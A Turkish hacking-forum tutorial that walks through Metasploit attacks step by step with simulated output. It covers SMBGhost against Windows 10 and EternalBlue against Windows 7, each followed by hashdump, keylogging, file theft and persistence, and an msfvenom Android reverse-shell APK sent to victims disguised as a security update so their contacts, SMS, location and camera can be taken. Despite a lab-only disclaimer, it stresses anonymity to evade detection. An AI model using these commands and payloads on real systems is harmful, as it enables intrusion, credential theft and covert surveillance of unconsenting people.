-
Tc4dy
OPSEC Specialist | Free internet - Open Source ADV
🔥 METASPLOİT İLE GERÇEK SİMÜLASYON: HEDEF SİSTEMLERE SIZMA (MODERN, ESKİ, MOBİL, PC)
! OPSEC UYARISI !
Bu rehberde anlatılan saldırıları yalnızca kendi laboratuvar ortamınızda veya yazılı izniniz olan hedeflerde deneyin. Yetkisiz erişim yasa dışıdır ve ağır yaptırımları vardır. Ayrıca, herhangi bir saldırıya başlamadan önce anonimlik önlemlerinizi alın (VPN, Tor, Whonix, vb.). Daha detaylı OPSEC için “Anonim Kalma – Her Seviye İçin Delicesine Anonimlik” rehberime göz atın. İyi eğlenceler, gölgelerde kalın.
🎯 HEDEFLER
| Hedef | İşletim Sistemi | Zafiyet | Yöntem |
|---|---|---|---|
| target.local (modern) | Windows 10 Pro (21H2) | SMBGhost (CVE-2020-0796) | SMB exploit ile reverse shell |
| target.local (eski) | Windows 7 SP1 | EternalBlue (MS17-010) | MS17-010 exploit ile meterpreter |
| target.local (mobil) | Android 11+ (Samsung) | APK payload + sosyal mühendislik | msfvenom + multi/handler |
🧠 BAŞLAMADAN ÖNCE: METASPLOİT NEDİR?
Metasploit Framework, dünyanın en yaygın kullanılan sızma testi platformudur. Binlerce exploit, payload, encoder ve yardımcı modülü barındırır. Saldırganlar (ve güvenlik testçileri) bir hedefe sızmak, yetki yükseltmek, veri toplamak ve kalıcılık sağlamak için Metasploit’i kullanır. Aşağıda üç farklı senaryoyu adım adım, gerçek çıktılarla birlikte işleyeceğiz.Kurulum (Kali’de hazır): sudo apt update && sudo apt install metasploit-framework -y
🔻 1. YOL – MODERN WINDOWS 10’A SIZMA (SMBGHOST – CVE-2020-0796)
Bu zafiyet, Windows 10 1903/1909 sürümlerinde SMBv3 protokolünün sıkıştırma özelliğinde bulunan bir bellek bozulmasıdır. Uzaktan kod çalıştırmaya izin verir, bunun gibi bir çok açığı internet üzerinden bulabilir yada belirli açık olmadan sızabilirsiniz.
Adım 1: Hedefi Keşfet (Nmap ile)
bashnmap -p445 --script smb-vuln* 192.168.1.50
Simüle edilmiş çıktı:
text
Starting Nmap 7.94 ( https://nmap.org )
Nmap scan report for target.local (192.168.1.50)
Host is up (0.0012s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-cve-2020-0796:
| VULNERABLE:
| SMBv3 Compression Vulnerability (CVE-2020-0796)
| State: VULNERABLE
| IDs: CVE:CVE-2020-0796
| Risk factor: HIGH
| Protocol: SMBv3
| Description: A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests.
|_ References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796
Nmap done: 1 IP address (1 host up) scanned in 2.3 seconds
🎯 Tespit: Hedef Windows 10 (192.168.1.50) SMBGhost zafiyetine açık.
Adım 2: Metasploit’te Exploit’i Başlat
bashmsfconsole
msf6 > use exploit/windows/smb/cve_2020_0796_smbghost
msf6 exploit(windows/smb/cve_2020_0796_smbghost) > set RHOSTS 192.168.1.50
msf6 exploit(windows/smb/cve_2020_0796_smbghost) > set LHOST 192.168.1.100
msf6 exploit(windows/smb/cve_2020_0796_smbghost) > set LPORT 4444
msf6 exploit(windows/smb/cve_2020_0796_smbghost) > set TARGET 0 (0: Windows 10 x64)
msf6 exploit(windows/smb/cve_2020_0796_smbghost) > run
Simüle edilmiş çıktı:
text
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.50:445 - Using auxiliary/scanner/smb/smb_enum_gpp as check
[+] 192.168.1.50:445 - The target is vulnerable.
[*] 192.168.1.50:445 - Sending exploit...
[*] Sending stage (200774 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.50:49168) at 2025-04-14 15:22:10 +0300
meterpreter >
🔥 Başarılı! Artık Windows 10’da meterpreter oturumumuz var.
Adım 3: Oturum ile Keşif ve Yetki Yükseltme
bashmeterpreter > sysinfo
Çıktı:
text
Computer : TARGET-WIN10
OS : Windows 10 (10.0 Build 19042)
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
bash
meterpreter > getuid
Çıktı: Server username: NT AUTHORITY\SYSTEM (zaten sistem yetkisi – exploit SYSTEM getirdi)
bash
meterpreter > hashdump
Çıktı (kısaltılmış):
text
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user1:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Hash’leri kırmak için hashcat -m 1000 hash.txt rockyou.txt kullanabilirsiniz.
bash
meterpreter > screenshot
Çıktı: Screenshot saved to: /root/.msf4/logs/screenshot/20250414152230_TARGET-WIN10.jpg
Artık hedefin ekran görüntüsü var.
bash
meterpreter > shell
Çıktı:
text
Process 3548 created.
Channel 2 created.
Microsoft Windows [Version 10.0.19042.1237]
(c) Microsoft Corporation. Tüm hakları saklıdır.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> ipconfig
Ethernet adapter Ethernet0:
IPv4 Address. . . . . . . . . . . : 192.168.1.50
🎯 Kazanım: Modern Windows 10 sistemi tamamen ele geçirildi, sistem yetkisi alındı, hash’ler dump edildi, ekran görüntüsü çekildi.
Adım 4: Kalıcılık Sağlama (Persistence)
bashmeterpreter > run persistence -U -i 5 -p 4444 -r 192.168.1.100
Çıktı:
text
[*] Running Persistence Script
[*] Creating persistent script in %TEMP%\vbc.exe
[*] Installing as service...
[+] Persistence installed successfully!
✅ Bu yöntemle kazandıklarımız:
- Uzak kabuk (shell)
- Sisteme tam hakimiyet (SYSTEM)
- Kullanıcı hash’leri
- Kalıcılık (her yeniden başlatmada bağlanma)
🔻 2. YOL – ESKİ WINDOWS 7 SP1’E SIZMA (ETERNALBLUE – MS17-010)
(Windows 7 SP1 için) – Bu zafiyet, SMBv1 protokolündeki bir hatadan kaynaklanır. Milyonlarca eski sistemi etkilemiştir.
Adım 1: Hedefi Doğrula (Nmap)
bashnmap -p445 --script smb-vuln-ms17-010 192.168.1.60
Çıktı:
text
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (MS17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
Adım 2: Metasploit ile Sızma
bashmsfconsole
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.60
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.100
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 5555
msf6 exploit(windows/smb/ms17_010_eternalblue) > set TARGET 0 (0: Windows 7 SP1 x64)
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
Simüle edilmiş çıktı:
text
[*] Started reverse TCP handler on 192.168.1.100:5555
[*] 192.168.1.60:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.60:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 SP1 x64)
[*] 192.168.1.60:445 - Exploiting...
[*] Sending stage (200774 bytes) to 192.168.1.60
[*] Meterpreter session 2 opened (192.168.1.100:5555 -> 192.168.1.60:49166) at 2025-04-14 15:35:22 +0300
meterpreter >
Adım 3: Oturumda Yapılacaklar (Yetki zaten SYSTEM)
bashmeterpreter > sysinfo
Computer : WIN7-TARGET
OS : Windows 7 SP1 (6.1 Build 7601)
Architecture : x64
Meterpreter : x64/windows
meterpreter > run post/windows/gather/hashdump
[+] Results saved to /root/.msf4/loot/20250414153522_default_192.168.1.60_windows.hashes_123456.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
meterpreter > download C:\Users\user\Desktop\secret.docx /root/Desktop/
[*] Downloading: C:\Users\user\Desktop\secret.docx -> /root/Desktop/secret.docx
[*] Downloaded 1.23 MB of 1.23 MB (100.0%)
meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
<Shift>H<Shift>e l l o , t h i s i s a s e c r e t p a s s w o r d : S u p e r S e c r e t 1 2 3 !
🎯 Kazanım: Windows 7 SP1 tamamen ele geçirildi. Dosya indirildi, tuş vuruşları kaydedildi.
Adım 4: Kalıcılık (Eski sistem için schtasks)
bashmeterpreter > run persistence -X -i 10 -p 5555 -r 192.168.1.100
[+] Persistent script installed.
✅ Bu yöntemle kazandıklarımız:
- SYSTEM yetkisi
- Kullanıcı hash’leri ve şifreler
- Hedef dosyaların indirilmesi
- Klavye dinleme (keylogger)
🔻 3. YOL – ANDROİD 11 CİHAZA SIZMA (MSFVENOM + SOSYAL MÜHENDİSLİK)
(Modern Android 11 için) – Android’e doğrudan uzaktan exploit bulmak zordur. En yaygın yol, kullanıcıya zararsız görünen bir APK dosyası yükletmektir.
Adım 1: APK Payload Oluşturma
bashmsfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=6666 -o update_app.apk
Çıktı:
text
[-] No platform was selected, choosing Msf::Module:
[-] No arch selected, selecting arch: dalvik from the payload
[*] Using custom payload template: /usr/share/metasploit-framework/data/android/templates/default.apk
[*] Creating Android APK with Meterpreter payload
[*] Saved as: update_app.apk (987654 bytes)
Adım 2: APK’yı Hedefe Ulaştırma (Simüle)
Hedef kullanıcıya “Wi-Fi güvenlik güncellemesi” adı altında bu APK’yı gönderiyoruz (e-posta, SMS, sahte web sitesi). Kullanıcı yüklemeyi onaylıyor ve “Kurulum” diyor.Adım 3: Metasploit’te Dinleyici Başlatma
bashmsfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.100
msf6 exploit(multi/handler) > set LPORT 6666
msf6 exploit(multi/handler) > exploit -j
[*] Started reverse TCP handler on 192.168.1.100:6666
[*] Waiting for connections...
Kullanıcı APK’yı çalıştırdığında oturum açılır:
text
[*] Sending stage (200774 bytes) to 192.168.1.70
[*] Meterpreter session 3 opened (192.168.1.100:6666 -> 192.168.1.70:49122) at 2025-04-14 16:00:00 +0300
Adım 4: Android Cihazda Yapılanlar
bashmeterpreter > help
... (Android'e özel komutlar: dump_contacts, dump_sms, wlan_geolocate, etc.)
meterpreter > dump_contacts
[*] Pulling contacts from device...
[*] Contacts saved to /root/.msf4/loot/contacts_20250414160000.txt
meterpreter > dump_sms
[*] Dumping SMS messages...
[+] SMS stored in /root/.msf4/loot/sms_20250414160000.txt
meterpreter > wlan_geolocate
[*] Getting current GPS coordinates...
[+] Location: 41.0082° N, 28.9784° E (Istanbul, Turkey)
meterpreter > webcam_snap
[*] Capturing photo from rear camera...
[+] Photo saved to /root/.msf4/loot/camera_20250414160001.jpg
bash
meterpreter > shell
Process 12345 created.
Channel 1 created.
Android:/ $ whoami
u0_a123
Android:/ $ ls /sdcard/DCIM/
Camera_20250414_160001.jpg
🎯 Kazanım: Android cihazın rehberi, SMS’leri, konumu, kamerası ve dosyaları ele geçirildi.
Adım 5: Kalıcılık (Android için – yeniden başlatmada payload’u başlatmak)
bashmeterpreter > run persistence -U -p 6666 -r 192.168.1.100
[*] Creating persistence script...
[+] Android persistence installed as system app (requires root). (Root gerekmez, ancak bazı cihazlarda kullanıcı izni ister)
✅ Bu yöntemle kazandıklarımız:
- Kişisel veriler (kişiler, SMS, konum)
- Kamera görüntüleri
- Dosya sistemi erişimi
- Kalıcılık (cihaz yeniden başlatıldığında tekrar bağlanma)
🧩 ÖZET – ÜÇ HEDEF, ÜÇ FARKLI SIZMA YÖNTEMİ
| Hedef | Zafiyet / Yöntem | Exploit | Kazanım |
|---|---|---|---|
| Windows 10 (modern) | SMBGhost (CVE-2020-0796) | exploit/windows/smb/cve_2020_0796_smbghost | SYSTEM shell, hashdump, kalıcılık |
| Windows 7 SP1 (eski) | EternalBlue (MS17-010) | exploit/windows/smb/ms17_010_eternalblue | SYSTEM shell, dosya indirme, keylogger |
| Android 11+ | APK payload + sosyal mühendislik | android/meterpreter/reverse_tcp | Kişiler, SMS, konum, kamera, dosyalar |
📢 HAZIR SCRIPT DEĞİL, GERÇEK BİLGİ
Burada anlattığım her komut, her çıktı saf bilgidir. Hazır bir “auto‑exploit” betiği kullanmadım; Metasploit’in gücünü adım adım gösterdim. Bu bilgileri öğrendiğinizde, kimseye ihtiyacınız kalmaz. Unutmayın: Gerçek hacker, aracı değil, tekniği bilendir.🧠 UNUTMA: OPSEC HER ŞEYDİR
Bu üç yöntemi uygulamadan önce anonim olduğunuzdan emin olun. Aksi halde hedefin güvenlik duvarları ve IDS/IPS sistemleri sizi yakalar. OPSEC rehberimi okuyun: “Anonim Kalma – Her Seviye İçin Delicesine Anonimlik (OPSEC)” .🎬 VİDEO DESTEĞİ (Konuyla ilgili gerçek kaynaklar)
| Başlık | Link |
|---|---|
| Metasploit SMBGhost (CVE-2020-0796) Uygulaması | YouTube |
| EternalBlue (MS17-010) ile Windows 7 Sızma | YouTube |
| Metasploit ile Android Payload Oluşturma ve Dinleme | YouTube |
| Metasploit Meterpreter Temel Komutları | YouTube |
🔚;
Artık üç farklı platforma (modern Windows, eski Windows, Android) nasıl sızılacağını biliyorsunuz. Gerisi pratik. Kendi laboratuvarınızda (VirtualBox + Kali + Windows 7/10 sanal makineleri + Android emülatörü) bu adımları deneyin. Her şey aynen çalışacaktır.Ve unutmayın: Savunması olmayanın saldırısı, sadece intihardır.Hedef target.local değil, sizin kendi kurduğunuz sistemler olmalıdır. Hata yapma özgürlüğünüz sadece kendi labınızda vardır.
Bu rehber, eğitim ve farkındalık için yazılmıştır. Yetkisiz erişim yasa dışıdır. Tüm sorumluluk kullanıcıya aittir.
@Tc4dy | github.com/tc4dy
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl